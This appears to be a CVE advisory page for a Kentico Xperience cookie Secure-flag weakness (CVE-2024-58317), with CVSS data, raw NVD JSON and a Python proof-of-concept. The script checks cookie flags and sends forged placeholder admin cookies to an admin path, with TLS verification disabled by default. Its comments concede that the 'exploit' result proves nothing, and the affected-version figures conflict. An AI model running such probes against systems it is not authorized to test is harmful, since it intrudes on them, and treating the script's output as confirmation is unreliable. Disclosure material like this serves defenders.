Security Vulnerability Report
CVE-2024-58317 CVSS 5.3 MEDIUM

CVE-2024-58317

Published: 2025-12-18 20:15:53
Last Modified: 2025-12-24 16:38:57

Description

A cookie security configuration vulnerability in Kentico Xperience allows attackers to bypass SSL requirements when setting administration cookies via web.config. The vulnerability affects .NET Framework projects by incorrectly handling the 'requireSSL' attribute, potentially compromising session security and authentication state.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
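Kentico Xperience < 13.0.235 (unconfirmed; the raw record below gives versionEndIncluding 13.0.164, so check the affected range against the vendor hotfix notes)
Kentico Xperience, .NET Framework edition (all versions)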

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
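import requests
import urllib3

# CVE-2024-58317 - Kentico Xperience cookie security configuration check.
#
# The advisory (CWE-614) describes administration cookies being issued without
# SSL enforcement when 'requireSSL' is configured via web.config in .NET
# Framework projects. This script only reads the attributes of the cookies a
# server sets; it does not demonstrate impact. A missing Secure attribute is an
# indicator to follow up on (web.config review, installed hotfix level), not
# proof that this CVE applies.

target_url = "https://TARGET_URL/"  # Replace with target URL (https, trailing slash)

# Certificate verification is off so lab hosts with self-signed certificates
# can be checked. With it off, the responses are not authenticated, so set this
# to True whenever the host presents a valid certificate.
VERIFY_TLS = False
if not VERIFY_TLS:
    urllib3.disable_warnings()

USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester'
REQUEST_TIMEOUT = 10


def _cookies_missing_secure(response):
    """Return the names of cookies set without the Secure attribute.

    Every hop of the redirect chain is inspected, because ``response.cookies``
    alone only holds cookies set by the final response.
    """
    missing = []
    for hop in (*response.history, response):
        for cookie in hop.cookies:
            # Names and flags only: cookie values may be session tokens and
            # should not end up in terminal scrollback or logs.
            flag = "Secure" if cookie.secure else "NOT Secure"
            print(f"    - {cookie.name}: {flag}")
            if not cookie.secure:
                missing.append(cookie.name)
    return missing


def check_vulnerability():
    """Check whether the target sets cookies without the Secure attribute.

    Requests the administration page and the site root without sending any
    cookies, then inspects the Secure attribute of every cookie the server
    sets.

    Returns:
        True if at least one cookie was set without Secure, False if none
        were or if a request failed.
    """
    print("[*] Testing for CVE-2024-58317: Kentico Xperience Cookie Security Bypass")

    if not target_url.lower().startswith("https://"):
        # CWE-614 is about cookies in an HTTPS session; over plain HTTP the
        # result says nothing about the requireSSL handling.
        print("[!] target_url is not https - results are not meaningful")

    headers = {'User-Agent': USER_AGENT}
    missing = []
    try:
        for path in ("admin", ""):
            response = requests.get(
                target_url + path,
                headers=headers,
                verify=VERIFY_TLS,
                timeout=REQUEST_TIMEOUT,
            )
            print(f"[*] GET /{path} status: {response.status_code}")
            missing.extend(_cookies_missing_secure(response))
    except requests.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False

    if missing:
        print("[!] Potential vulnerability detected - Cookie configuration may be affected")
        return True
    return False


def exploit_cookie_bypass():
    """Send placeholder cookies to an admin path and report the status class.

    NOTE(review): a 200 or 302 is also what an unauthenticated request gets
    (login page, or a redirect to it), so a True result is not evidence of a
    bypass. The request path is the one given in the original listing and is
    not confirmed against the advisory.

    Returns:
        True if the server answered 200 or 302, False otherwise or on a
        request failure.
    """
    print("[*] Attempting cookie bypass exploit...")

    # Placeholder values; they do not correspond to any real session.
    placeholder_cookies = {
        'CMSAdminCookie': 'malicious_session_id',
        'CMSCsrfCookie': 'csrf_token_bypass'
    }

    try:
        response = requests.get(
            target_url + "admin/cmssections/savesomething",
            cookies=placeholder_cookies,
            verify=VERIFY_TLS,
            timeout=REQUEST_TIMEOUT
        )
    except requests.RequestException as e:
        print(f"[!] Exploit failed: {e}")
        return False

    print(f"[*] Exploit response status: {response.status_code}")
    return response.status_code in (200, 302)


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2024-58317 PoC - Kentico Xperience Cookie Security Bypass")
    print("=" * 60)

    if check_vulnerability():
        print("[+] Target appears to be vulnerable")
        if exploit_cookie_bypass():
            # The status code alone cannot confirm the issue; say so rather
            # than report a confirmed bypass.
            print("[!] Follow-up request returned 200/302 - this alone does not confirm a bypass; verify manually")
    else:
        print("[-] Target does not appear to be vulnerable or is not reachable")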

References

Raw JSON Data

{"cve": {"id": "CVE-2024-58317", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.473", "lastModified": "2025-12-24T16:38:56.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cookie security configuration vulnerability in Kentico Xperience allows attackers to bypass SSL requirements when setting administration cookies via web.config. The vulnerability affects .NET Framework projects by incorrectly handling the 'requireSSL' attribute, potentially compromising session security and authentication state."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-614"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.164", "matchCriteriaId": "F2B3010A-B713-41A0-83BC-5AFCA093BA9F"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-cookie-security-configuration", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}